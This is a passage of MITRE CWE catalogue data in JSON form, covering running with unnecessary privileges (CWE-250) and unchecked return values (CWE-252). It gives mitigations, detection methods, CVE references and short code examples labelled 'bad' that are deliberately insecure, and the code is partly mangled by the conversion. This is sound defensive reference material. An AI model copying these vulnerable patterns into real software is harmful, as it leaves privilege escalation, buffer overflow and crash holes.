privileges."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":{"xhtml:p":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},{"Phase":"Installation"},{"Phase":"Architecture and Design","Note":{"xhtml:p":"If an application has this design problem, then it can be easier for the developer to make implementation-related errors such as CWE-271 (Privilege Dropping / Lowering Errors). In addition, the consequences of Privilege Chaining (CWE-268) can become more severe."}},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands","Read Application Data","DoS: Crash, Exit, or Restart"],"Note":"An attacker will be able to gain access to any resources that are allowed by the extra privileges. Common results include executing code, disabling services, and reading restricted data."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"attr":{"@_Detection_Method_ID":"DM-11.7"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and perform a login. Look for library functions and system calls that indicate when privileges are being raised or dropped. Look for accesses of resources that are restricted to normal users."]},"Effectiveness_Notes":"Note that this technique is only useful for privilege issues related to system resources. It is not likely to detect application-level business rules that are related to privileges, such as if a blog system allows a user to delete a blog entry without first checking that the user has administrator privileges."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Compare binary / bytecode to application permission manifest"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host Application Interface Scanner"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Configuration Checker","Permission Manifest Analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-18"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Identify the functionality that requires additional privileges, such as access to privileged operating system resources. Wrap and centralize this functionality if possible, and isolate the privileged code as much as possible from other code [REF-76]. Raise privileges as late as possible, and drop them as soon as possible to avoid CWE-271. Avoid weaknesses such as CWE-288 and CWE-420 by protecting all possible communication channels that could interact with the privileged code, such as a secondary socket that is only intended to be accessed by administrators."},{"attr":{"@_Mitigation_ID":"MIT-18"},"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":"Identify the functionality that requires additional privileges, such as access to privileged operating system resources. Wrap and centralize this functionality if possible, and isolate the privileged code as much as possible from other code [REF-76]. Raise privileges as late as possible, and drop them as soon as possible to avoid CWE-271. Avoid weaknesses such as CWE-288 and CWE-420 by protecting all possible communication channels that could interact with the privileged code, such as a secondary socket that is only intended to be accessed by administrators."},{"Phase":"Implementation","Description":"Perform extensive input validation for any privileged code that must be exposed to the user and reject anything that does not fit your strict requirements."},{"attr":{"@_Mitigation_ID":"MIT-19"},"Phase":"Implementation","Description":"When dropping privileges, ensure that they have been dropped successfully to avoid CWE-273. As protection mechanisms in the environment get stronger, privilege-dropping calls may fail even if it seems like they would always succeed."},{"Phase":"Implementation","Description":"If circumstances force you to run with extra privileges, then determine the minimum access level necessary. First identify the different permissions that the software and its users will need to perform their actions, such as file read and write permissions, network socket permissions, and so forth. Then explicitly allow those actions while denying all else [REF-76]. Perform extensive input validation and canonicalization to minimize the chances of introducing a separate vulnerability. This mitigation is much more prone to error than dropping the privileges in the first place."},{"attr":{"@_Mitigation_ID":"MIT-37"},"Phase":["Operation","System Configuration"],"Strategy":"Environment Hardening","Description":"Ensure that the software runs properly under the Federal Desktop Core Configuration (FDCC) [REF-199] or an equivalent hardening configuration guide, which many organizations use to limit the attack surface and potential risk of deployed software."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-126"},"Intro_Text":"This code temporarily raises the program\'s privileges to allow creation of a new user folder.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def makeNewUserDir(username):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if invalidUsername(username):try:except OSError:return True","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"print(\'Usernames cannot contain invalid characters\')return False","xhtml:br":["","",""],"xhtml:i":"#avoid CWE-22 and CWE-78"}},{"#text":"raisePrivileges()os.mkdir(\'/home/\' + username)lowerPrivileges()","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"print(\'Unable to create new user directory for user:\' + username)return False","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["","",""]}}}},"Body_Text":"While the program only raises its privilege level to create the folder and immediately lowers it again, if the call to os.mkdir() throws an exception, the call to lowerPrivileges() will not occur. As a result, the program is indefinitely operating in a raised privilege state, possibly allowing further exploitation to occur."},{"Intro_Text":"The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"chroot(APP_HOME);chdir(\\"/\\");FILE* data = fopen(argv[1], \\"r+\\");...","xhtml:br":["","",""]}},"Body_Text":"Constraining the process inside the application\'s home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced."},{"Intro_Text":"This application intends to use a user\'s location to determine the timezone the user is in:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();setTimeZone(userCurrLocation);","xhtml:br":["","","",""]}},"Body_Text":"This is unnecessary use of the location API, as this information is already available using the Android Time API. Always be sure there is not another way to obtain needed information before resorting to using the location API."},{"attr":{"@_Demonstrative_Example_ID":"DX-111"},"Intro_Text":"This code uses location to determine the user\'s current US State location.","Body_Text":["First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application\'s manifest.xml:","During execution, a call to getLastLocation() will return a location based on the application\'s location permissions. In this case the application has permission for the most accurate location possible:","While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":"&lt;uses-permission android:name=\\"android.permission.ACCESS_FINE_LOCATION\\"/&gt;"},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();deriveStateFromCoords(userCurrLocation);","xhtml:br":["","","",""]}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-4217","Description":"FTP client program on a certain OS runs with setuid privileges and has a buffer overflow. Most clients do not need extra privileges, so an overflow is not a vulnerability for those clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4217"},{"Reference":"CVE-2008-1877","Description":"Program runs with privileges and calls another program with the same privileges, which allows read of arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1877"},{"Reference":"CVE-2007-5159","Description":"OS incorrectly installs a program with setuid privileges, allowing users to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5159"},{"Reference":"CVE-2008-4638","Description":"Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4638"},{"Reference":"CVE-2008-0162","Description":"Program does not drop privileges before calling another program, allowing code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0162"},{"Reference":"CVE-2008-0368","Description":"setuid root program allows creation of arbitrary files through command line argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0368"},{"Reference":"CVE-2007-3931","Description":"Installation script installs some programs as setuid when they shouldn\'t be.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3931"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Often Misused: Privilege Management"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER09-J","Entry_Name":"Minimize privileges before deserializing from a privilege context"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"104"}},{"attr":{"@_CAPEC_ID":"470"}},{"attr":{"@_CAPEC_ID":"69"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 7, &#34;Running with Least Privilege&#34; Page 207"}},{"attr":{"@_External_Reference_ID":"REF-199"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 16: Executing Code With Too Much Privilege.&#34; Page 243"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Privilege Vulnerabilities&#34;, Page 477"}}]},"Notes":{"Note":[{"#text":"There is a close association with CWE-653 (Insufficient Separation of Privileges). CWE-653 is about providing separate components for each privilege; CWE-250 is about ensuring that each component has the least amount of privileges possible.","attr":{"@_Type":"Relationship"}},{"#text":"CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category. Both CWE-272 and CWE-250 are in active use by the community. The \\"least privilege\\" phrase has multiple interpretations.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Modes_of_Introduction, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Description, Likelihood_of_Exploit, Maintenance_Notes, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Observed_Examples, References, Relationships, Type"}],"Previous_Entry_Name":[{"#text":"Often Misused: Privilege Management","attr":{"@_Date":"2008-01-30"}},{"#text":"Design Principle Violation: Failure to Use Least Privilege","attr":{"@_Date":"2009-01-12"}}]}},"252":{"attr":{"@_ID":"252","@_Name":"Unchecked Return Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not check the return value from a method or function, which can prevent it from detecting unexpected states and conditions.","Extended_Description":"Two common programmer assumptions are \\"this function call can never fail\\" and \\"it doesn\'t matter if this function call fails\\". If an attacker can force the function to fail or otherwise return a value that is not expected, then the subsequent program logic could lead to a vulnerability, because the software is not in a state that the programmer assumes. For example, if the program calls a function to drop privileges but does not check the return code to ensure that privileges were successfully dropped, then the program will continue to operate with the higher privileges.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"476","@_View_ID":"1000","@_Chain_ID":"690"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Many functions will return some value about the success of their actions. This will alert the program whether or not to handle any errors caused by that function."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":["Unexpected State","DoS: Crash, Exit, or Restart"],"Note":"An unexpected return value could place the system in a state that could lead to a crash or other unintended behaviors."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-53"},"Phase":"Implementation","Description":"Check the results of all functions that return a value and verify that the value is expected.","Effectiveness":"High","Effectiveness_Notes":"Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment."},{"Phase":"Implementation","Description":"Ensure that you account for all possible return values from the function."},{"Phase":"Implementation","Description":"When designing a function, make sure you return a value or throw an exception in case of an error."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-7"},"Intro_Text":"Consider the following code segment:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char buf[10], cp_buf[10];fgets(buf, 10, stdin);strcpy(cp_buf, buf);","xhtml:br":["",""]}},"Body_Text":"The programmer expects that when fgets() returns, buf will contain a null-terminated string of length 9 or less. But if an I/O error occurs, fgets() will not null-terminate buf. Furthermore, if the end of the file is reached before any characters are read, fgets() returns without writing anything to buf. In both of these situations, fgets() signals that something unusual has happened by returning NULL, but in this code, the warning will not be noticed. The lack of a null terminator in buf can result in a buffer overflow in the subsequent call to strcpy()."},{"attr":{"@_Demonstrative_Example_ID":"DX-114"},"Intro_Text":"In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int returnChunkSize(void *) {}int main() {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["","","","","",""],"xhtml:i":["/* if chunk info is valid, return the size of usable memory,","* else, return -1 to indicate an error","*/"]}},{"#text":"...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},"Body_Text":"If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788)."},{"attr":{"@_Demonstrative_Example_ID":"DX-8"},"Intro_Text":"The following code does not check to see if memory allocation succeeded before attempting to use the pointer returned by malloc().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"buf = (char*) malloc(req_size);strncpy(buf, xfer, req_size);","xhtml:br":""}},"Body_Text":["The traditional defense of this coding error is: \\"If my program runs out of memory, it will fail. It doesn\'t matter whether I handle the error or allow the program to die with a segmentation fault when it tries to dereference the null pointer.\\" This argument ignores three important considerations:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Depending upon the type and size of the application, it may be possible to free memory that is being used elsewhere so that execution can continue."},{"xhtml:div":"It is impossible for the program to perform a graceful exit if required. If the program is performing an atomic operation, it can leave the system in an inconsistent state."},{"xhtml:div":"The programmer has lost the opportunity to record diagnostic information. Did the call to malloc() fail because req_size was too large or because there were too many requests being handled at the same time? Or was it caused by a memory leak that has built up over time? Without handling the error, there is no way to know."}]}}]},{"attr":{"@_Demonstrative_Example_ID":"DX-9"},"Intro_Text":"The following examples read a file into a byte array.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"char[] byteArray = new char[1024];for (IEnumerator i=users.GetEnumerator(); i.MoveNext() ;i.Current()) {}","xhtml:br":"","xhtml:div":{"#text":"String userName = (String) i.Current();String pFileName = PFILE_ROOT + \\"/\\" + userName;StreamReader sr = new StreamReader(pFileName);sr.Read(byteArray,0,1024);//the file is always 1k bytessr.Close();processPFile(userName, byteArray);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"FileInputStream fis;byte[] byteArray = new byte[1024];for (Iterator i=users.iterator(); i.hasNext();) {","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String userName = (String) i.next();String pFileName = PFILE_ROOT + \\"/\\" + userName;FileInputStream fis = new FileInputStream(pFileName);fis.read(byteArray); // the file is always 1k bytesfis.close();processPFile(userName, byteArray);","xhtml:br":["","","","","",""]}}}}],"Body_Text":"The code loops through a set of users, reading a private data file for each user. The programmer assumes that the files are always 1 kilobyte in size and therefore ignores the return value from Read(). If an attacker can create a smaller file, the program will recycle the remainder of the data from the previous user and treat it as though it belongs to the attacker."},{"attr":{"@_Demonstrative_Example_ID":"DX-10"},"Intro_Text":"The following code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String itemName = request.getParameter(ITEM_NAME);if (itemName.compareTo(IMPORTANT_ITEM) == 0) {}...","xhtml:br":["",""],"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String itemName = request.Item(ITEM_NAME);if (itemName.Equals(IMPORTANT_ITEM)) {}...","xhtml:br":["",""],"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["The following code does not check to see if the string returned by the Item property is null before calling the member function Equals(), potentially causing a NULL dereference.","The traditional defense of this coding error is: \\"I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn\'t matter whether I handle the error or allow the program to die dereferencing a null value.\\" But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved."]},{"attr":{"@_Demonstrative_Example_ID":"DX-11"},"Intro_Text":"The following code shows a system property that is set to null and later dereferenced by a programmer who mistakenly assumes it will always be defined.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"System.clearProperty(\\"os.name\\");...String os = System.getProperty(\\"os.name\\");if (os.equalsIgnoreCase(\\"Windows 95\\")) System.out.println(\\"Not supported\\");","xhtml:br":["","",""]}},"Body_Text":"The traditional defense of this coding error is: \\"I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn\'t matter whether I handle the error or allow the program to die dereferencing a null value.\\" But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved."},{"attr":{"@_Demonstrative_Example_ID":"DX-12"},"Intro_Text":"The following VB.NET code does not check to make sure that it has read 50 bytes from myfile.txt. This can cause DoDangerousOperation() to operate on an unexpected value.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"Dim MyFile As New FileStream(\\"myfile.txt\\", FileMode.Open, FileAccess.Read, FileShare.Read)Dim MyArray(50) As ByteMyFile.Read(MyArray, 0, 50)DoDangerousOperation(MyArray(20))","xhtml:br":["","",""]}},"Body_Text":"In .NET, it is not uncommon for programmers to misunderstand Read() and related methods that are part of many System.IO classes. The stream and reader classes do not consider it to be unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested."},{"Intro_Text":"It is not uncommon for Java programmers to misunderstand read() and related methods that are part of many java.io classes. Most errors and unusual events in Java result in an exception being thrown. But the stream and reader classes do not consider it unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested. This behavior makes it important for programmers to examine the return value from read() and other IO methods to ensure that they receive the amount of data they expect."},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference\\n\\t       (CWE-476) would then occur in the call to strcpy().","Note that this code is also vulnerable to a buffer overflow (CWE-119)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-24"},"Intro_Text":"The following function attempts to acquire a lock in order to perform operations on a shared resource.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"pthread_mutex_lock(mutex);pthread_mutex_unlock(mutex);","xhtml:br":["","","","",""],"xhtml:i":"/* access shared resource */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int result;result = pthread_mutex_lock(mutex);if (0 != result)return pthread_mutex_unlock(mutex);","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"return result;","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* access shared resource */"}}}}],"Body_Text":["However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior.","In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-17533","Description":"Chain: unchecked return value (CWE-252) of some functions for policy enforcement leads to authorization bypass 